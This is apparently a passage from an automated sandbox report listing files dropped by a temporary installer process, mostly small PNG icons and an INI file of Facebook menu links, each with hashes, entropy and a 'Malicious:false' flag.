                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                          Entropy (8bit):6.530333940085824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNpjvb61Qo2SAo+yeZG7q5Vp:6v/78/n+jDqQmEyeZ8g
                                                                                                                                                                                                                                                          MD5:EE2EC82FDFACF590ED0211B44987C617
                                                                                                                                                                                                                                                          SHA1:71F0AFC24952BB5C2F334C56F801470176BCCEC2
                                                                                                                                                                                                                                                          SHA-256:F8199692B7CE8D0C77D9DED524F679D64FF7723421345425B431EE933868AAC0
                                                                                                                                                                                                                                                          SHA-512:220A8C913FED060F38FCA7835D508D8D88531EF940532E8173257741433ED7FB21223CD2EE1EDDB5E770BD44AA632F8B043481CED038167901D65C74A6CC6192
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`...:.?...?....8H...`C.*\.a....V.1H.........>...ge..|...w..'...A.... 5-..`..U.}R.I. }.......y..).5..7.s.....u...?.p...t>..$.R.l ..[aR.O......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [News]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):859
                                                                                                                                                                                                                                                          Entropy (8bit):4.858296034006616
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Ty3COfcKd063/4Ga1rmWCdmr1gm+amVyxpgmkmAEnnmmImC4dmEnq:+kKGQiC5Enrq
                                                                                                                                                                                                                                                          MD5:4A6A1B208E79D27168441977D43897FC
                                                                                                                                                                                                                                                          SHA1:FAE08C5EF8DB510F634E46623AB09C63EA9C3F8A
                                                                                                                                                                                                                                                          SHA-256:F2B9D0C45FA2A9B15BB9694C26BD75B45B4E011B99D80604D2984C0F856B2AD9
                                                                                                                                                                                                                                                          SHA-512:79E43D69F7973750B534BDE680380BC912B906F3D3D848255BA3F8ADE4DC7FAD460CD0FF14230AEAED4285F291D6510AF57FA1F9876ABEFDE1F6D56890B35D03
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Welcome]..ID="facebook.com/?sk=welcome"..[News]..ID="facebook.com/?sk=nf"..[Messages]..ID="facebook.com/messages"..[Events]..ID="facebook.com/events"..[Find friends]..ID="facebook.com/find-friends/browser"..[Invite friends]..ID="facebook.com/?sk=ff"..[Friends]..ID="facebook.com/lists"..[Friends List]..ID="/friends?ft_ref=flsa"..[Groups]..ID="facebook.com/bookmarks/groups"..[Settings]..ID="facebook.com/settings?tab=account"..[Security]..ID="facebook.com/settings?tab=security"..[Notifications]..ID="facebook.com/settings?tab=notifications"..[Subscribers]..ID="facebook.com/settings?tab=subscribers"..[Apps]..ID="facebook.com/settings?tab=applications"..[Payments]..ID="facebook.com/settings?tab=payments"..[Facebook Ads]..ID="facebook.com/settings?tab=ads"..[Gifts]..ID="facebook.com/settings?tab=gifts"..[Privacy]..ID="facebook.com/settings/?tab=privacy"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):409
                                                                                                                                                                                                                                                          Entropy (8bit):7.015430309226083
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/ntuuZyeN46QM3TNzORtgDjrSNNXH:j1yA47QRORtgXuL
                                                                                                                                                                                                                                                          MD5:45409D06153FF84BDB5AB3E30C7CAB12
                                                                                                                                                                                                                                                          SHA1:AB84313D7A29E9D9C6308E3B99CB247AAADE34C4
                                                                                                                                                                                                                                                          SHA-256:52611BFC775199483CF8216F2FAEC18FD56B9D895A1173338B36BE5F14F5FC06
                                                                                                                                                                                                                                                          SHA-512:7C21E74A7787B1F26F0A5A4ADC4B4D469C069F6A066E4AE45D72F5515696313BAEC74C9435E04B812521339918E08E2136EBAA81E4351053AF9D372BB372F377
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O.S...0....fH&........3S.......f0s.}......Z...5...-,aM^zw.{}m.*.2..x...2.YC....$..u......*....9I..-...(.R wf.G..0....>+...lr..f../R*q.q.3.......4M.`..q.c.....$6M..1&.K.F{.6....U=I..?...M.h1dFQd.`.#...zew..\.EAA......v...$...\.$.S.....K.W.b.d...w.....R.F......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):304
                                                                                                                                                                                                                                                          Entropy (8bit):6.615232112735145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhP8LMR/C+wZA3te4YeOiG/WrSUAHmrOk3I9/t6CEyO9hbp:6v/7V/nw5WGUAHmrJ3Wl3Ol
                                                                                                                                                                                                                                                          MD5:7710D6BF6295D39378CE75797D7509B5
                                                                                                                                                                                                                                                          SHA1:090E061712842B2611BDDF21DE8FDC016DE827AB
                                                                                                                                                                                                                                                          SHA-256:3A098E07391825DB6349455DAF4215AE19C52A55B6838F7539FC1D439F5988A0
                                                                                                                                                                                                                                                          SHA-512:725B1F1292B10C80FAF1B3F9799A8833866829687A798037FEA2477F8E567E077FD2868B1B177D74B7C8C86F501C8E9706733D600774BECB53141BD136C98F5B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............V%.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.``........@..:;..A........w...'..5W...'....h.a...Pw0..lb 9..0..q.."..Z.~.9..C.....31....Dk.16..g....b.>.`#..;W.....A.1H=H.C....Pc...b.>. ..b)2........+4F....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):417
                                                                                                                                                                                                                                                          Entropy (8bit):6.94896891695791
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te4bUHmsrNAhcSAZF8qYe+QRePg5gJjsDzEm2I81SwJL2l/sc:6v/78/nXUfyFM8q5Ig5gIzjMZSN
                                                                                                                                                                                                                                                          MD5:4C24F1DEA3731AF8E87753BF5809B7AA
                                                                                                                                                                                                                                                          SHA1:E66175AEF9B3B505215D5B8E2502C78A6662493A
                                                                                                                                                                                                                                                          SHA-256:501002F4107D366ABFD5659C858B56EF0A46C053236A83C2BF44AEAA4D41F510
                                                                                                                                                                                                                                                          SHA-512:7AE28379921677BAAD7C011A4FD5D8BC61740A4F4F51D4C726B7765AD0FA4FAE098F3B3EC6E05043DB050F2E0028265DE7A2FE7943A6462790B590FF8787C917
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8OcH....V. ..c..@._|xD....4.....a.......:r.A\..?..dt.A....'.A.P.x...H".e...}...O....H.n..G..#cl. k...b.....#cl. ..s...W..............l..n.......A.$.w...g..0<E....}...Y.,.7...s..S..?y...A.%].Q0..dq.. ...'U.DE....3.Y.l...........HpJ.e@......?y..'~...n.@.q*@....Pm...uJ....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):414
                                                                                                                                                                                                                                                          Entropy (8bit):6.921441707444873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNq0dooGB9bqqTLPolIae+w2iYjDbg2UOj93OFo4wrbp:6v/78/nilvunTLseF2iYjfg29VOFS
                                                                                                                                                                                                                                                          MD5:6D7B39EE6BA125324EC0457FB8B1CF30
                                                                                                                                                                                                                                                          SHA1:E7B708B0D544F6B3137AB7E06914C8F318859DB3
                                                                                                                                                                                                                                                          SHA-256:7A9A198F92900BF042FEDB164367091853F9E3517B389197234889E68A05B04E
                                                                                                                                                                                                                                                          SHA-512:14CFE6B76479E2BD27E8893E2096B1A27B9B8726E3D70F64F163BEAD669E06D793AD176DF19073ECD5D491E7386A66F74E7AE8734DAC56DD292E401BD2382033
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.T .q....U.Sk6.'.a5...o..............dHd....W...0s...E+)0`.. .IrA.P....h.y..v....Y.......gff.1H....n.O.^.6..I.e#;.....G. .....n3.v...Ov.1...@..0 .a.........S...a@$0.;g.B..f.6..x!...}.!..t|........#...+..._..?..dL(.a..v.O...}.......F..8...P.3A6.'&..P.....e.K......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):331
                                                                                                                                                                                                                                                          Entropy (8bit):6.6701546506374205
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teRZQUgXtmGvGDJ0IkloKlVJjh60HEwTp:6v/78/nGboZvGDQbRF9
                                                                                                                                                                                                                                                          MD5:CC83BBCB39E5B47545CBDFBABFE69864
                                                                                                                                                                                                                                                          SHA1:C2EBFD1842B6877B69F32E00AE7A55BCFA063802
                                                                                                                                                                                                                                                          SHA-256:71197BC1C1D20F42851D4F5ABD91CD47D6C52E9C0100CEC8FBCC57B2E515B4B3
                                                                                                                                                                                                                                                          SHA-512:929369F0D508A6326C0019701CA56E4694109DF2D2EE5372B6F2227F16E7FAC367263CF4065E8E493CC2D69129C116D582076040CBC71A70AF4CCD128BC62165
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc` ..t.>....9A.@E.../...b. ...`..H...Ob..).j...?.q..........0A5&!..r..T|1A......c.Wpj..R....I.....4......K......@z....4......../ ?.;~..o.4.....(.......E%z....J.@J@"..r.....".#....4.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                          Entropy (8bit):6.666726809754627
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teHAFYqNQHvot6aM1nqJyVlMt+OxMp:6v/78/noAF2vonMDHs+Ox+
                                                                                                                                                                                                                                                          MD5:7D35A55137029755B25CA2B25F54D7AE
                                                                                                                                                                                                                                                          SHA1:22C1FA56B55C250889EB7B2AECE02803F34E4D43
                                                                                                                                                                                                                                                          SHA-256:07256C3BA7DF49D4258054B35AFD01555CC25BD32D19DA852F1077C5B298A8CD
                                                                                                                                                                                                                                                          SHA-512:2FFE767C9FCE4BC994460E7071579B6DF94A650FF9E3F9CC0538D599CD40178304302583C826F9CF39BAD2F160433E264BD2265DB17D016FA60158EF34461D0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`..L.........@...K.....?..O....Y.e...m./...7.....A. .Y-V.@.a......I6...p. C@|.!X].jZ... ........n....A|......l...)|py5..77...X.....p.a....^@.@........x.@Jz...$..^......7.23.....y..?..k.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                          Entropy (8bit):6.603752167197913
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te+/CG3J1R7/1JrZywu9ym9mmAivY6Ppmj/jp:6v/78/nfCG3JHVywuUm9mmAiQ6Bmh
                                                                                                                                                                                                                                                          MD5:58280774747B0A7F0CA8B29DACA0B917
                                                                                                                                                                                                                                                          SHA1:0BEEDF45E1CC739DAD3886AD1532A05BDFD2A3E8
                                                                                                                                                                                                                                                          SHA-256:A7FA8ED622AECB52E7FDB363B32CC44C3A6FF5837FF78917DD177DBBE15B7DD6
                                                                                                                                                                                                                                                          SHA-512:21FCDC686E3B700753E975C7A78884E7C0EBAF0ADABF13152B199B97F7F1F6F8FBAF1295ABDA7E2FA5D81683894EB280C1AA92E6695AEA56A289E9F17AE4095E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.....?k1Y......g...s.!.......h...,.........3x..k`>.F....`.P.S....7..O`.A4.}'.]....`..`.@4Lq..`.@4^.`....X.!..r@b."r."..l.r.P/.T..$9!..].//XG...4.|.........4..'h.H...........CK.Tl.u....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):296
                                                                                                                                                                                                                                                          Entropy (8bit):6.500966192845998
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teBQFMnlqsTJee5uicbPfZSyxX0GUd/eup:6v/78/nIQFMnkyf54rfsrpz
                                                                                                                                                                                                                                                          MD5:1374A978134A935973CAF3CD4BFD5DD6
                                                                                                                                                                                                                                                          SHA1:3A24FBE3ACDA81875702DE3DC013EA3C3B717AB5
                                                                                                                                                                                                                                                          SHA-256:DF28F5437300E6BF466FED1E74E785D4BD205ADDB1AACCBB37F51E7FD79B9C13
                                                                                                                                                                                                                                                          SHA-512:076C7993D4547042FF31C8560FC3C0A699C940CAC85668D9622E6B5F26F26C90DB5E395A1AEC0EEACDF842996A5D734FBCC310638C0D3E4C97E328419ED4000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.&...<...I.....4N.6.?).d...7...2..{..YC...a5.b...h....A..GX1H...(6...d...p....$.^.........w.<.....@..]XJ....K...(.....X^d.2......R..G... .k..^.j....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                          Entropy (8bit):6.530333940085824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNpjvb61Qo2SAo+yeZG7q5Vp:6v/78/n+jDqQmEyeZ8g
                                                                                                                                                                                                                                                          MD5:EE2EC82FDFACF590ED0211B44987C617
                                                                                                                                                                                                                                                          SHA1:71F0AFC24952BB5C2F334C56F801470176BCCEC2
                                                                                                                                                                                                                                                          SHA-256:F8199692B7CE8D0C77D9DED524F679D64FF7723421345425B431EE933868AAC0
                                                                                                                                                                                                                                                          SHA-512:220A8C913FED060F38FCA7835D508D8D88531EF940532E8173257741433ED7FB21223CD2EE1EDDB5E770BD44AA632F8B043481CED038167901D65C74A6CC6192
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`...:.?...?....8H...`C.*\.a....V.1H.........>...ge..|...w..'...A.... 5-..`..U.}R.I. }.......y..).5..7.s.....u...?.p...t>..$.R.l ..[aR.O......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):307
                                                                                                                                                                                                                                                          Entropy (8bit):6.610384624893472
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tepODZkidAJRzwBtNpQ+YiMpOhbi9eo77Vp:6v/78/nffTBvpQRiombi9j7
                                                                                                                                                                                                                                                          MD5:06CE05DA1418C5F5B952911492F1D313
                                                                                                                                                                                                                                                          SHA1:17A0D4EBD1E5A5BD338ECCAEF1CA9944EEC7C156
                                                                                                                                                                                                                                                          SHA-256:380154EAE1DE86B8AA27433A0044FBB471A0C067E14DD8DD740F6419A06F0EFB
                                                                                                                                                                                                                                                          SHA-512:3735BF636D31B885B429EA1C70CCC3850666A801C53B40F5570EF584D6180486E22A06DB31757987DDC5EDBB209CBF2790A8DB2566C8962107519CEC75F7A871
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.p.i.....da.^.....>..Az..x{{...g..^ ..7...a....@.c.............>0...5.W.X...;......765.....b]........... .06..`~.?........0Y..{......_......,..Kqf....l9pA}....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):386
                                                                                                                                                                                                                                                          Entropy (8bit):7.00776812280233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tedVeog/dmQEyGZ34lO47R4pyOcVuAUrm7OGBQ6bp:6v/78/nyA5dmQHuU7SpyOcVtz/Bt1
                                                                                                                                                                                                                                                          MD5:9321CA9A72F08DDF4987816DDCA3D413
                                                                                                                                                                                                                                                          SHA1:DF2EE42EB884D660440C3EBE6D8227EA443DE23A
                                                                                                                                                                                                                                                          SHA-256:46BD2F7186989CAA26BF20092F0BDBA9EC94357A69940F6C8EA16E8E5C0FAEA7
                                                                                                                                                                                                                                                          SHA-512:F37F4348594CB29622B0CEFBD8515772DE49DE8040F906209D6EA44844BDBDDE1C88DF1167B13AFF3D3BF59A41831E7895EF1B4F5C03774B1060BD8FF5D76EAA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O./..P........a.h...a..n0..e.."XV.k........9........x....s.o.M.Z..}1MSt]W .+.....M.....E.$I.@.G.0...LA...X.%.a(..Q+6...Tr.*.h..@...9.54j.&.....JcnL.G...x.T..........Z...h.6....<..V..j..<y.f.@S2...d...O..^.T....T...{2..u.....=.q..x.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):459
                                                                                                                                                                                                                                                          Entropy (8bit):7.157014739512398
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nhHoLgTdcsOkCuZ3I6xhC3kTGtjzx7:XdXau5I6pTi17
                                                                                                                                                                                                                                                          MD5:73A35AA153A7310E1DE170CE339F0242
                                                                                                                                                                                                                                                          SHA1:85016176CB165872D08073CB27F23600599F338C
